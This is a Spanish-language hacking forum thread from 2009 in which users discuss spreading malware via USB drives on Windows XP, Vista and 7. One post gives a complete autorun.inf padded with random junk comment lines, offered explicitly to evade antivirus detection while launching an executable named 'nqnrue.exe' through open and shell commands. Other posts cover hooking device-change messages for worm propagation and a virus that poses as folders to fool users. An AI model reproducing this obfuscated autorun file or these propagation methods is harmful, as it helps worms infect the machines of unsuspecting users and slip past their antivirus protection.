Tema destacado: Sigue las noticias más importantes de elhacker.net en  twitter!
 Autor
|
Tema: Nuevo metodo de infeccion USB (Leído 2,767 veces)
|
Jaixon Jax
 Desconectado
Mensajes: 855
|
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
XcryptOR
Desconectado
Mensajes: 225
|
como que los autorun.inf no funcionan en vista o windows 7?, no se de donde sacas eso, y cualquiera de los codes que hay aqui funcionan, aunque si quieres una manera profesional usa hooks.
saludos
PD. busca aquí hay mucho acerca de esto
mira y si lo que quieres es que tu autorun.inf no sea detectado agregale basura dentro del archivo, no has visto el contenido del archivo inf de algunos nuevos virus que utilizan propagación por USB
|
|
|
|
« Última modificación: 8 Julio 2009, 00:04 por XcryptOR »
|
En línea
|
|
|
|
|
[Zero]
|
Yo oí que en win7 dejaba de funcionar, no lo probé, pero aunque así sea, solo hay pasarse unas horas delante de la pantalla a pensar  . Saludos |
|
|
|
|
En línea
|
“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.” Nietzsche |
|
|
Pyros32
Desconectado
Mensajes: 49
|
como que los autorun.inf no funcionan en vista o windows 7?, no se de donde sacas eso, y cualquiera de los codes que hay aqui funcionan, aunque si quieres una manera profesional usa hooks.
saludos
PD. busca aquí hay mucho acerca de esto
mira y si lo que quieres es que tu autorun.inf no sea detectado agregale basura dentro del archivo, no has visto el contenido del archivo inf de algunos nuevos virus que utilizan propagación por USB
no se que entiendes por hook y no, el comando open no funciona en XP SP3 , pero shell/ sigue funcionando.. depende mas de la mentalidad del user... pero por la cantidad de worms que lo usan parece que no va mal no se como ira en windows 7 sigo diciendo que dentro de poco solo quedaran las U3 http://foro.elhacker.net/software/usb_roba_datos_ayudita-t242991.0.html
|
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Pyro tiene razon yo los he probado en XP SP3 y en vista y no funcionan pero todavia es superfactible utilizarlos por que el vista no se masifico, y el seven esta en veremos.
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
XcryptOR
Desconectado
Mensajes: 225
|
no se que entiendes por hook
me refiero al metodo de propagación USB, interceptando WM_DeviceChange
|
|
|
|
|
En línea
|
|
|
|
Arkangel_0x7C5
Desconectado
Mensajes: 298
|
no se que entiendes por hook
me refiero al metodo de propagación USB, interceptando WM_DeviceChange Pero no puedes interceptar nada si antes no te has ejecutado amigo XcryptOR. y este método suele ser la puerta de entrada. Saludos
|
|
|
|
|
En línea
|
|
|
|
XcryptOR
Desconectado
Mensajes: 225
|
como te digo me referia a la propagación. Lo del autorun.inf es otra cosa totalmente diferente y ya esta explicado y el tema resuelto agregando basura al autorun.inf, infectas la maquina y la propagación pues el mejor metodo hook. y por si no quedo claro lo de la basura al autorun aqui dejo algo ;UOybAseGc
;fSAtyuoRHGuCdNhAY
;MUrbLTiFJMCWKBwhIrRTUWFSLkKKnObcIb
[AutoRun]
;GelRnVSPCBbWhlQRlcRxpgxxqZECkGictxtrwjOuqZvqBEqPfWgsCKSEUhxJJCszDvrf
open=nqnrue.exe
;xKISnJXUtfHlapYvyOBzMOqkJUZxMkBcBHFAhFFInPngcWBFfxsDghUHslxYiCJHhNHFvFtcHY
;mXazjMxQVWbHro
;45F27A231FB2BAE1D96E012D0B34BDAC8F820FEAB727D2C7BFC81571
Icon=%system%\shell32.dll,7
;dQSGIGQxaZFKCTvRnAUPHeoAqSdoHU
;DRHjcaNdJpuUxMMMSrowdEovDxvbKNFSfNBat
;uBLMEevUgvmmtqyZbRkixdJIVrujpiXwJOfKFAAyOcdP
;iXoqBhhvXRNSNAjqRUgQfBZecZadEjLKmOfiyF
;uuOSHxEapRiIiHqbVIxWgRPUgALNZJgOUqKSFRWibCHXASfJRbDZlNLFUKBgIjKe
;zTJmDzpSgegsPBwFFLgcJnNpPHxFEHucOj
;kPjQdKgiizzNsZMCBPGdwjowqjhMqwlrbaoVFhZEcptNJprUNSL
;fGFeVzFrOFIzfAUzHtFiSKHVBgpbcTzphhIhfVvmEofmZWcq
;jnsYoJxmDgFJqzUervbcdIBdQoTAaERtKE
;OZvpurmNZfatauHiXsAHJJ
;xQOPNGHjCuupQXQeetQfbCjiICxnQPwKVLwytrRkksiLArzzvHnwmNgnOtMo
;QRJwCAljIXqbUCtPCadZSda
;CuLyIYBtKlCcPmHBzXaqZBUIrSIoONh
;LrRKXZPxVqHbafkNbwOlgmRGytbeYgtBAPbE
;BcmjAwXPKyV
;VE
;VSxCcYmWTpJjrAyRNEY
;CyJCDNMeJmQDXLnWqMf
UseAutoPlay=1
action=Open Drive
;PhDgmoIeBFdFGMGwNuswZxrlTyWTHOFkOlycBgrLjstknQIGWqQRKTmCeJoHIfARQ
;rgTklVYxzoRHZJVRqwkJpOzqzruFWagUmIEHE
action= @nqnrue.exe
;QUJfzEHpLghD
;FLYfwcJaGSTmYaQKFdEFmLWBDmmpSfKkHZyxAEYfmautIpATCYwpEk
;IekNgVjJOxnTwGWJmGkysXymD
;AJvziTizHqMTNpVOHTpwxTQptIQAnz
shell\open\Command=nqnrue.exe
shell\open\Default=1
;uRJSoXjSwlGHhcRfiihECYbQYWqQocDKrQQARVMbSBpvlEw
shell\explore\Command=nqnrue.exe
;gsqJmqJLSkMgCcZJuCiTprlvoaxxmuSjjDFYVnKUWJdSMCFc
|
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
Pyros32
Desconectado
Mensajes: 49
|
En windows vista y en XP SP3 si andan  , en Windows 7 no anda . en vista y XP si andan, pero solo pueden crear una opcion en el menu de arranque... no pueden abrir el exe (testeado en XP SP2 Actaulizado sin Antivirus con el code de XcryptOR, con mis codes y con lo que anda por google) no se que entiendes por hook
me refiero al metodo de propagación USB, interceptando WM_DeviceChange Pero no puedes interceptar nada si antes no te has ejecutado amigo XcryptOR. y este método suele ser la puerta de entrada. Saludos A eso iba, un hook es una intercepcion de una llamada del sistema... no puedes acer qe el se abra tu programa usando hooks
|
|
|
|
|
En línea
|
|
|
|
jackl007
Desconectado
Mensajes: 1.380
[UserRPL]
|
la ves pasada vi un virus que obtenia las carpetas de usuario del usb y se copiaba en ellas con el mismo nombre y con el icono de carpeta; de este modo la probabilidad de que la persona se confunda y en vez de entrar a la carpeta, ejecutaba el virus... (claro al ejecutar el virus, este te mostraba el contenido de la carpeta para no dar sospechas), jaja me llamo mucho la atencion este virus... jajaja
lo malo es que era facil darse cuenta de que el virus estaba corriendo, y eliminarlo fue cosa de segundos... tan solo mirar en el task manager para saber cual era virus... jajaja
|
|
|
|
|
En línea
|
|
|
|
|
|
jackl007
Desconectado
Mensajes: 1.380
[UserRPL]
|
tu fuiste en que a cada rato abria y cerraba procesos? (bueno el virus)... eso consumia muchos recursos, por eso fue facil darse cuenta... si es asi... pues tu virusito estubo por PERU, jajaja
y aparecia en msconfig...
facil eliminarlo tambien...
|
|
|
|
|
En línea
|
|
|
|
|
 |
![WWW](data:text/html,<img src="http://img199.imageshack.us/img199/7002/norris.gif" />;http://)
:xDpero siempre crei que era para despistar los usuarios, ay unos muy chistoso que cuando le haces click con el boton derecho te sale un poco de caras, matachos en el menu jeje. 
